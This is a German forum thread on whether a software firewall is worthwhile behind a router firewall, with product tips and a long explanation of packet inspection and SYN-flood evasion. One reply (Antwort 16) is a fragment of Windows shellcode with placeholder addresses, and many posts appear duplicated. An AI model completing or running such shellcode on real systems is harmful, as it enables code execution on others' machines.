Supportnet / Forum / Security/Viren
Firewall software trotz Hardware Firewall?
Frage
Hallo,
weiss einer ob ich eine Firewall Software trotz Hardware Firewall brauche?
Mein Router hat ein Firewall. Sollte ich trotzdem eine Firewall Software wie Zonealarm installieren? Reicht der Schutz genügend aus?
Danke
Antwort 1 von Griemokhan
Ob man überhaupt ne Firewall braucht, ist hier öfters heftig umstritten.
Ich für meinen Teil empfehle dir zusätzlich zum Router eine Softwarefirewall,
aber nicht die von ZoneAlarm,
sondern die von Sygate (auch free für privat).
Mit ZoneAlarm gibt´s wohl öfter Probleme,
mit Sygate kenn ich keine.
Ich für meinen Teil empfehle dir zusätzlich zum Router eine Softwarefirewall,
aber nicht die von ZoneAlarm,
sondern die von Sygate (auch free für privat).
Mit ZoneAlarm gibt´s wohl öfter Probleme,
mit Sygate kenn ich keine.
Antwort 2 von sisqonrw
danke für die schnelle und super Antwortt.
kann aber leider kein sygate drauf machen, da ich IE komplett gelöscht habe. IE ist Vorraussetzung. Gibts ne alternative?
was ist mit tiny oder outpost. sind die auch freeware und weisst du ob die funktionieren auch wenn ich kein IE habe?
Danke
kann aber leider kein sygate drauf machen, da ich IE komplett gelöscht habe. IE ist Vorraussetzung. Gibts ne alternative?
was ist mit tiny oder outpost. sind die auch freeware und weisst du ob die funktionieren auch wenn ich kein IE habe?
Danke
Antwort 3 von Griemokhan
Ich bin mit Firefox unterwegs.
Hab nie ein Problem mit Sygate bemerkt.
Hab nie ein Problem mit Sygate bemerkt.
Antwort 4 von Jürgen 54
Hallo,
Wieso brauchst Du den IE zum download?
Das geht auch mit Firevox und sogar bequemer.
Gruß
--juergen--
Wieso brauchst Du den IE zum download?
Das geht auch mit Firevox und sogar bequemer.
Gruß
--juergen--
Antwort 5 von sisqonrw
ja aber du hast bestimmt noch IE drauf und nutzt nur Firefox.
ich habe IE komplet gelöscht bzw. gekillt.
ich habe IE komplet gelöscht bzw. gekillt.
Antwort 6 von sisqonrw
jürgen nicht zum download....
ich kann sygate nicht installieren ohne IE!!!
;-)
ich kann sygate nicht installieren ohne IE!!!
;-)
Antwort 7 von Jürgen 54
Hi,
Kannst du glauben, das hat doch nichts nit dem IE zu tun.
Der wäre nur wichtig für Updates von Microsoft, wenn du das meinst hast du recht , dass geht nur mit dem IE.
--juergen--
Kannst du glauben, das hat doch nichts nit dem IE zu tun.
Der wäre nur wichtig für Updates von Microsoft, wenn du das meinst hast du recht , dass geht nur mit dem IE.
--juergen--
Antwort 8 von sisqonrw
ich bekam die meldung das er sypate ohne IE nicht installiert....
Antwort 9 von Jürgen 54
Achso sorry, wieso ist das so?
Das ist mir neu.
Gruß
Das ist mir neu.
Gruß
Antwort 10 von sisqonrw
no idea
kannst du mir eine freeware firewall alternative empfehlen?
danke
kannst du mir eine freeware firewall alternative empfehlen?
danke
Antwort 11 von Griemokhan
Antwort 12 von Jürgen 54
Hallo,
Könnte ich-- aber nicht gleich meckern--
Die Im SP2 verbesserte XP firewall reicht völlig aus ( hast doch XP? )
Den Rest übernimmt Dein Router.
--juergen--
Könnte ich-- aber nicht gleich meckern--
Die Im SP2 verbesserte XP firewall reicht völlig aus ( hast doch XP? )
Den Rest übernimmt Dein Router.
--juergen--
Antwort 13 von Griemokhan
Pardon, hab was überlesen.
Aber kaum vorstellbar.
Aber kaum vorstellbar.
Antwort 14 von WasGeHTmITDIrAB
Alter wie kann man nur ne XP Firewall vorschlagen......
Antwort 15 von Jürgen 54
Hallo,
@WasGeHTmITDIrAB,
Dann beschreibe mal Deine schlechten Erfahrungen genauer.
Es ist sicher von allgemeinen Interesse.
--juergen--
@WasGeHTmITDIrAB,
Dann beschreibe mal Deine schlechten Erfahrungen genauer.
Es ist sicher von allgemeinen Interesse.
--juergen--
Antwort 16 von WasGeHTmITDIrAB
"xb8XXXX" // mov eax, XXXX -> WinExec()
"xffxd0" // call eax
"x4e" // dec esi
"x56" // push esi
"xb8YYYY" // mov eax, YYYY -> ExitProcess()
"xffxd0"; // call eax
int main(int argc, char* argv[])
{
unsigned char *ptr = (unsigned char *)shellcode;
"xffxd0" // call eax
"x4e" // dec esi
"x56" // push esi
"xb8YYYY" // mov eax, YYYY -> ExitProcess()
"xffxd0"; // call eax
int main(int argc, char* argv[])
{
unsigned char *ptr = (unsigned char *)shellcode;
Antwort 17 von miko
Router Firewall
SP2 Firewall
AntiVir Personal Edtition
Mozilla Firefox
a2 Free
Ist eine bomben Kombination.
gruß michael
SP2 Firewall
AntiVir Personal Edtition
Mozilla Firefox
a2 Free
Ist eine bomben Kombination.
gruß michael
Antwort 18 von Zemmel
Hi !
Jetzt sind hier 47 Firewall-Programme empfohlen worden, aber keiner erklärt, warum eine zusätzliche Desktopfirewall sinnvoll ist.
Der Router sichert zwar durch die eingebaute Firewall das System von außen ab, aber es ist ihm völlig schnurz, wenn ein ein Programm (z.B. ein Trojaner) versucht, unberechtigt auf´s Internet zuzugreifen. Eine Desktopfirewall würde in dem Fall Alarm schlagen.
Welches Programm man installiert, hängt von technischen Gegebenheiten ab (siehe oben das Problem mit dem deinstallierten IE), und auch vom Geschmack oder den Anforderungen des Anwenders.
Wenn Du 20 Leute fragst, bekommst Du sicherlich mindestens 15 verschiedene Empfehlungen.
Ich hab z.B. mit ZoneAlarm keine Probleme...
Gruß
Klaus
Jetzt sind hier 47 Firewall-Programme empfohlen worden, aber keiner erklärt, warum eine zusätzliche Desktopfirewall sinnvoll ist.
Der Router sichert zwar durch die eingebaute Firewall das System von außen ab, aber es ist ihm völlig schnurz, wenn ein ein Programm (z.B. ein Trojaner) versucht, unberechtigt auf´s Internet zuzugreifen. Eine Desktopfirewall würde in dem Fall Alarm schlagen.
Welches Programm man installiert, hängt von technischen Gegebenheiten ab (siehe oben das Problem mit dem deinstallierten IE), und auch vom Geschmack oder den Anforderungen des Anwenders.
Wenn Du 20 Leute fragst, bekommst Du sicherlich mindestens 15 verschiedene Empfehlungen.
Ich hab z.B. mit ZoneAlarm keine Probleme...
Gruß
Klaus
Antwort 19 von sisqonrw
wieso empfehlt mir niemand sowas wie wie tiny, outpost, etc....
Antwort 20 von sisqonrw
danke zemmel für die ausführliche antwort.
also doch ein zusätzlichen firewall
danke
also doch ein zusätzlichen firewall
danke
Antwort 21 von Griemokhan
..., weil ich mir mit Outpost mal mein System zerschossen habe -
ähnlich wie mit ZoneAlarm.
Lag aber sicher an mir.
ähnlich wie mit ZoneAlarm.
Lag aber sicher an mir.
Antwort 22 von miko
Zitat:
Hallo,
weiss einer ob ich eine Firewall Software trotz Hardware Firewall brauche?
Hallo,
weiss einer ob ich eine Firewall Software trotz Hardware Firewall brauche?
Die Frage war ob und nicht wieso.
gruß michael
Antwort 23 von mosu
Hi all,
hier vielleicht mal ´ne "Grundsatzdiskussion" zum Thema Fw:
Echte Hardware- Fw´s gibts von Cisco und einigen anderen Herstellern, Software- Fw´s als Desktop- Fw´s wie Sand am Meer... Die Frage ist doch - was macht eigentlich ´ne Fw?
Im Internet wird als Standard- Protokollsuite TCP/IP verwendet, adressiert wird mit IP- Adressen und PORTS - und die sind es, die von Fw´s ausgewertet werden. Bei den Desktop- Lösungen und auch bei einfachen "Hardware"- Fw´s wird eine stateful packet inspection gemacht, das bedeutet (vereinfacht ausgedrückt), die zu sendenden und die empfangenen IP- Pakete werden darauf untersucht, ob sie zur aktuellen Sitzung, sprich Internet- Anwendung gehören oder nicht, ferner darauf, ob sie fragmentiert sind, ob es Häufungen von Steuer- und Nachrichtenpaketen (ICMP) gibt, oder ob eine andere IP- Adresse "von außen" auf das System zugreift, z.B. um herauszufinden, ob und wo das Zielsystem kompromittierbar ist (Portscan, ICMP- Ping, aktive Daemon- Prozesse bzw. Serverprozesse, die auf Anforderungen aus dem Internet antworten etc.)
Die Fw untersucht also jedes IP- Packet und stellt fest - darf passieren oder nicht. Dazu muß ein Satz von Regeln definiert werden, nach denen diese Entscheidung getroffen wird. Dieser Satz von Regeln wird bei jedem IP- Paket abgearbeitet, verbraucht also im Falle von Desktop- Fw´s Systemressourcen (Speicher, CPU- Zeit) - je mehr Regeln, desto mehr Ressourcen. Hier sollte also die erste Überlegung ansetzen - Brauch´ ich die Desktop- Fw wirklich? Welche Regeln definiere ich? Was muß gefiltert werden?
Dann gilt: Wo eine Software arbeitet, gibt es auch einen Weg, sie unwirksam zu machen... Im einfachsten Falle wird die Fw "überfahren", sie wird mit so vielen fragmentierten, gespooften oder SYN- Paketen bombardiert, bis die Systemressourcen des Zielsystems erschöpft sind und das Betriebssystem entnervt aufgibt- Das Ergebnis ist bei Micro$oft- Betriebssystemen der Systemabsturz mit dem bluescreen of death, bei anderen Systemen gibt der Fw- Prozess auf, und das Ziel ist erreicht - das System ist kompromittierbar. Gute Software erkennt zwar das Problem und geht mit den Ressourcen sparsam um, trotzdem stellt die SPI hohe Anforderungen an CPU, Speicher und das Betriebssystem - und ich kenne keine Desktop- Fw. die nicht binnen kürzester Zeit durchtunnelt oder unwirksam gemacht werden konnte.
Anders schon bei Router- Lösungen: Hier wird ebenfalss eine SPI gemacht, nur muß sich damit das Betriebssystem des Routers herumschlagen, die Maschinen im "dahinter" liegenden privaten Netz bleiben verschont. Wenn mal die Preise verglichen werden, kommt meist dabei heraus, dass der Router mit Packet filtering, URL filtering und Port filtering einschl. spoofing avoid, fragment dropping und ICMP blocking oftmals die billigere (und zuverlässigere) Lösung ist - unabhängig von Betriebssystem, schneller, sicherer... Das schützt zwar auch nicht vor Trojanern, aber da gibt es ohnehin nur wenig Möglichkeiten - Hier hilft z.B. eine gewisse "Surf- Disziplin" und natürlich eine Anti- Trojan- Software auf dem neuesten Stand (und natürlich ein gut konfiguriertes URL- Filter). Der Router hat außerdem den Vorteil, dass er das private Netz, in dem die Benutzer arbeiten, vor dem Internet "versteckt" durch NAT (Network Address Translation) und auch die Ports umstellen kann (PAT). Damit wird das private Netz schon recht gut geschützt.
Wirklichen Schutz gäbe es nur, wenn alle IP- Pakete einer Sitzung komplett gesammelt (reassembled) werden, zur Sitzung zugeordnet und nach Komplettierung der gesamten Sitzung untersucht werden - und erst nach positiver Verifikation als Datenstrom an das Zielsystem weitergegeben werden - die klassiche Lösung ist ein Proxy Server im privaten Netz, der über einen Router den Internet- Kontakt herstellt .
Zusammenfassung: Desktop- Firewalls taugen nicht viel, jedenfalls nicht mehr als ein gut konfigurierter Router. Welcher Router verwendet werden soll, kann hier nicht empfohlen werden, achtet beim Kauf auf die Features (s.o.). Proxy Lösungen gibt es auch recht gute, die meisten laufen nicht unter Micro$oft- Systemen... *gg*
hier vielleicht mal ´ne "Grundsatzdiskussion" zum Thema Fw:
Echte Hardware- Fw´s gibts von Cisco und einigen anderen Herstellern, Software- Fw´s als Desktop- Fw´s wie Sand am Meer... Die Frage ist doch - was macht eigentlich ´ne Fw?
Im Internet wird als Standard- Protokollsuite TCP/IP verwendet, adressiert wird mit IP- Adressen und PORTS - und die sind es, die von Fw´s ausgewertet werden. Bei den Desktop- Lösungen und auch bei einfachen "Hardware"- Fw´s wird eine stateful packet inspection gemacht, das bedeutet (vereinfacht ausgedrückt), die zu sendenden und die empfangenen IP- Pakete werden darauf untersucht, ob sie zur aktuellen Sitzung, sprich Internet- Anwendung gehören oder nicht, ferner darauf, ob sie fragmentiert sind, ob es Häufungen von Steuer- und Nachrichtenpaketen (ICMP) gibt, oder ob eine andere IP- Adresse "von außen" auf das System zugreift, z.B. um herauszufinden, ob und wo das Zielsystem kompromittierbar ist (Portscan, ICMP- Ping, aktive Daemon- Prozesse bzw. Serverprozesse, die auf Anforderungen aus dem Internet antworten etc.)
Die Fw untersucht also jedes IP- Packet und stellt fest - darf passieren oder nicht. Dazu muß ein Satz von Regeln definiert werden, nach denen diese Entscheidung getroffen wird. Dieser Satz von Regeln wird bei jedem IP- Paket abgearbeitet, verbraucht also im Falle von Desktop- Fw´s Systemressourcen (Speicher, CPU- Zeit) - je mehr Regeln, desto mehr Ressourcen. Hier sollte also die erste Überlegung ansetzen - Brauch´ ich die Desktop- Fw wirklich? Welche Regeln definiere ich? Was muß gefiltert werden?
Dann gilt: Wo eine Software arbeitet, gibt es auch einen Weg, sie unwirksam zu machen... Im einfachsten Falle wird die Fw "überfahren", sie wird mit so vielen fragmentierten, gespooften oder SYN- Paketen bombardiert, bis die Systemressourcen des Zielsystems erschöpft sind und das Betriebssystem entnervt aufgibt- Das Ergebnis ist bei Micro$oft- Betriebssystemen der Systemabsturz mit dem bluescreen of death, bei anderen Systemen gibt der Fw- Prozess auf, und das Ziel ist erreicht - das System ist kompromittierbar. Gute Software erkennt zwar das Problem und geht mit den Ressourcen sparsam um, trotzdem stellt die SPI hohe Anforderungen an CPU, Speicher und das Betriebssystem - und ich kenne keine Desktop- Fw. die nicht binnen kürzester Zeit durchtunnelt oder unwirksam gemacht werden konnte.
Anders schon bei Router- Lösungen: Hier wird ebenfalss eine SPI gemacht, nur muß sich damit das Betriebssystem des Routers herumschlagen, die Maschinen im "dahinter" liegenden privaten Netz bleiben verschont. Wenn mal die Preise verglichen werden, kommt meist dabei heraus, dass der Router mit Packet filtering, URL filtering und Port filtering einschl. spoofing avoid, fragment dropping und ICMP blocking oftmals die billigere (und zuverlässigere) Lösung ist - unabhängig von Betriebssystem, schneller, sicherer... Das schützt zwar auch nicht vor Trojanern, aber da gibt es ohnehin nur wenig Möglichkeiten - Hier hilft z.B. eine gewisse "Surf- Disziplin" und natürlich eine Anti- Trojan- Software auf dem neuesten Stand (und natürlich ein gut konfiguriertes URL- Filter). Der Router hat außerdem den Vorteil, dass er das private Netz, in dem die Benutzer arbeiten, vor dem Internet "versteckt" durch NAT (Network Address Translation) und auch die Ports umstellen kann (PAT). Damit wird das private Netz schon recht gut geschützt.
Wirklichen Schutz gäbe es nur, wenn alle IP- Pakete einer Sitzung komplett gesammelt (reassembled) werden, zur Sitzung zugeordnet und nach Komplettierung der gesamten Sitzung untersucht werden - und erst nach positiver Verifikation als Datenstrom an das Zielsystem weitergegeben werden - die klassiche Lösung ist ein Proxy Server im privaten Netz, der über einen Router den Internet- Kontakt herstellt .
Zusammenfassung: Desktop- Firewalls taugen nicht viel, jedenfalls nicht mehr als ein gut konfigurierter Router. Welcher Router verwendet werden soll, kann hier nicht empfohlen werden, achtet beim Kauf auf die Features (s.o.). Proxy Lösungen gibt es auch recht gute, die meisten laufen nicht unter Micro$oft- Systemen... *gg*
Antwort 24 von kicher
hihi...
IE Komplett deinstalliert, dann läuft ja nicht mal mehr die HILFE Funktion, geschweige die Dienste !!
tztz
IE Komplett deinstalliert, dann läuft ja nicht mal mehr die HILFE Funktion, geschweige die Dienste !!
tztz
Antwort 25 von Zemmel
Hi !
Meiner Ansicht nach der einzige Sinn einer Desktop-FW, wenn man hinter einem Router mit Hardware-FW sitzt...
Gruß
Klaus
Zitat:
Der Router sichert zwar durch die eingebaute Firewall das System von außen ab, aber es ist ihm völlig schnurz, wenn ein ein Programm (z.B. ein Trojaner) versucht, unberechtigt auf´s Internet zuzugreifen. Eine Desktopfirewall würde in dem Fall Alarm schlagen..
Der Router sichert zwar durch die eingebaute Firewall das System von außen ab, aber es ist ihm völlig schnurz, wenn ein ein Programm (z.B. ein Trojaner) versucht, unberechtigt auf´s Internet zuzugreifen. Eine Desktopfirewall würde in dem Fall Alarm schlagen..
Meiner Ansicht nach der einzige Sinn einer Desktop-FW, wenn man hinter einem Router mit Hardware-FW sitzt...
Gruß
Klaus
Antwort 26 von firefox
Zitat:
Der Router sichert zwar durch die eingebaute Firewall das System von außen ab, aber es ist ihm völlig schnurz, wenn ein ein Programm (z.B. ein Trojaner) versucht, unberechtigt auf´s Internet zuzugreifen. Eine Desktopfirewall würde in dem Fall Alarm schlagen..
Der Router sichert zwar durch die eingebaute Firewall das System von außen ab, aber es ist ihm völlig schnurz, wenn ein ein Programm (z.B. ein Trojaner) versucht, unberechtigt auf´s Internet zuzugreifen. Eine Desktopfirewall würde in dem Fall Alarm schlagen..
Wunschdenken? Leider kann das eine Desktopfirewall nicht garantieren - nein es geht sogar relativ einfach sie zum umgehen oder zu täuschen. --> www.linkblock.de
Zitat:
Meiner Ansicht nach der einzige Sinn einer Desktop-FW, wenn man hinter einem Router mit Hardware-FW sitzt...
Meiner Ansicht nach der einzige Sinn einer Desktop-FW, wenn man hinter einem Router mit Hardware-FW sitzt...
Dumm nur wenn gerade dieser Sinn sehr zweifelhaft von der Sicherheit her ist ...
Antwort 27 von TheHappyJoker
Hier mal ein interessantes Video zum Thema Desktop-Firewalls:
CCC Seminar - Personal Firewalls (MPEG-4, 252kbps video/48kbps audio, ca. 213 MB)
Oder auch hier in kleineren (nicht so schönen ;-) Format (Ogg Theora, 100kbps video/76kbps audio, ca. 150 MB).
Da erfahrt ihr, warum Desktop-Firewalls absolut sinnlos sind und ohne Probleme umgangen werden können (und im Beispiel von Norton sogar gegen den Nutzer selbst benutzt werden können (Firewall wird genutzt, um den User auszuspionieren)).
<gruß thj>
CCC Seminar - Personal Firewalls (MPEG-4, 252kbps video/48kbps audio, ca. 213 MB)
Oder auch hier in kleineren (nicht so schönen ;-) Format (Ogg Theora, 100kbps video/76kbps audio, ca. 150 MB).
Da erfahrt ihr, warum Desktop-Firewalls absolut sinnlos sind und ohne Probleme umgangen werden können (und im Beispiel von Norton sogar gegen den Nutzer selbst benutzt werden können (Firewall wird genutzt, um den User auszuspionieren)).
<gruß thj>
Antwort 28 von firefox
Zu dem Video gibts auch einen Link - besser zu dessen Vortrag, das ist vielleicht etwas übersichtlicher :
http://copton.net/vortraege/pfw/index.html
http://copton.net/vortraege/pfw/index.html
Antwort 29 von blubber
wen die hw firewall gut konfigurierst ist brauchst du keine sw-fw. eine sw-fw ist nur intressant für den abgehenden datenstrom.
wen du einen guten virenscanner und spyscanner hast und nicht jede datei wahllos öffnest und im net auf ominösen seiten unterwegs bist, regelmässig patches installst ist meiner meinung eine sw-fw nicht nötig.
sw-fw sind eh für die katz da richtig böse direkt bei der hw einsteigen und die sw-fw umgehen bevor sie zum zuge kommt.
wichtiger finde ich fast das dein maildienst einen guten virenscanner on board hast.
bin seit langem ohne sw-fw unterwegs und habe keine probleme und ich kenn mich mit der materie nur am rande aus.
wen install tinny, musst du dich aber einarbeiten und nicht jede abgehende|eingehende verbindung akzeptieren sonst bist du eh wieder am anfang ;)
ist eine kleine religionsfrage mittlerweile, die einten schwören drauf andere...
entscheide selber was dir sympathisch ist.
würd nur nicht norton installen, kriegst du fast nicht mehr raus da sie so tief ins sys eingreifft und gelobt wird sie nicht sehr.
wen du einen guten virenscanner und spyscanner hast und nicht jede datei wahllos öffnest und im net auf ominösen seiten unterwegs bist, regelmässig patches installst ist meiner meinung eine sw-fw nicht nötig.
sw-fw sind eh für die katz da richtig böse direkt bei der hw einsteigen und die sw-fw umgehen bevor sie zum zuge kommt.
wichtiger finde ich fast das dein maildienst einen guten virenscanner on board hast.
bin seit langem ohne sw-fw unterwegs und habe keine probleme und ich kenn mich mit der materie nur am rande aus.
wen install tinny, musst du dich aber einarbeiten und nicht jede abgehende|eingehende verbindung akzeptieren sonst bist du eh wieder am anfang ;)
ist eine kleine religionsfrage mittlerweile, die einten schwören drauf andere...
entscheide selber was dir sympathisch ist.
würd nur nicht norton installen, kriegst du fast nicht mehr raus da sie so tief ins sys eingreifft und gelobt wird sie nicht sehr.